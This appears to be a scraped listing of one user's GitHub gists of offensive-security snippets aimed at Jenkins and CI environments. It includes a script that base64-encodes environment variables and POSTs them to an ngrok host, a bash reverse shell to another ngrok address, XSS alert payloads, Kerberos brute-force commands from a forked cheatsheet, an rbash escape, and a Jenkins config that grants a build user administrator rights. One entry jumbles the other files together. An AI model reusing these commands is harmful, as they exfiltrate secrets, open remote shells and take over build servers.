Dibyendu Sikdar dibsy

## code.sh
echo "${{ vars.NOT_KNOWN }}"

## jenkins.json
{
  "_class" : "hudson.model.Hudson",
  "assignedLabels" : [
    {
      "name" : "built-in"
    }
  ],
  "mode" : "NORMAL",
  "nodeDescription" : "the Jenkins controller's built-in node",
  "nodeName" : "",

## rbash-escape.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                dibsy
                / rbash-escape.md
            
            
              Created
              July 10, 2023 18:14
                — forked from PSJoshi/rbash-escape.md
            
              
                Escape from rbash to bash shell
              
          
    Change rbash to bash

psj@ubuntu:~$ ssh psj@server_name-t "bash --noprofile"

List available commands:

$ compgen -c 

Essentially you need to do the following:


## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                dibsy
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              June 1, 2023 14:25
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## mal.js
alert(document.domain);

## cmd.sh
env|base64 >/tmp/f
export aa=`tr -d '\n'< /tmp/f`
curl -s -X POST https://6aee-91-166-172-59.ngrok-free.app --data $aa

## configModified.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson>
  <disabledAdministrativeMonitors/>
  <version>2.387.2</version>
  <numExecutors>1</numExecutors>
  <mode>NORMAL</mode>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>USER:hudson.model.Hudson.Administer:superadmin</permission>
    <permission>USER:hudson.model.Hudson.Administer:builduser</permission>

## temp-cmd.txt
bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/14352 0>&1

## HOOK.groovy
import jenkins.model.*
def instance = Jenkins.getInstance()

import hudson.security.*
def realm = new HudsonPrivateSecurityRealm(false)
instance.setSecurityRealm(realm)

def strategy = new hudson.security.FullControlOnceLoggedInAuthorizationStrategy()
strategy.setAllowAnonymousRead(false)
instance.setAuthorizationStrategy(strategy)

## test.js
alert(1)
	{
	"_class" : "hudson.model.Hudson",
	"assignedLabels" : [
	{
	"name" : "built-in"
	}
	],
	"mode" : "NORMAL",
	"nodeDescription" : "the Jenkins controller's built-in node",
	"nodeName" : "",
	env\|base64 >/tmp/f
	export aa=`tr -d '\n'< /tmp/f`
	curl -s -X POST https://6aee-91-166-172-59.ngrok-free.app --data $aa
	<?xml version='1.1' encoding='UTF-8'?>
	<hudson>
	<disabledAdministrativeMonitors/>
	<version>2.387.2</version>
	<numExecutors>1</numExecutors>
	<mode>NORMAL</mode>
	<useSecurity>true</useSecurity>
	<authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
	<permission>USER:hudson.model.Hudson.Administer:superadmin</permission>
	<permission>USER:hudson.model.Hudson.Administer:builduser</permission>
	import jenkins.model.*
	def instance = Jenkins.getInstance()

	import hudson.security.*
	def realm = new HudsonPrivateSecurityRealm(false)
	instance.setSecurityRealm(realm)

	def strategy = new hudson.security.FullControlOnceLoggedInAuthorizationStrategy()
	strategy.setAllowAnonymousRead(false)
	instance.setAuthorizationStrategy(strategy)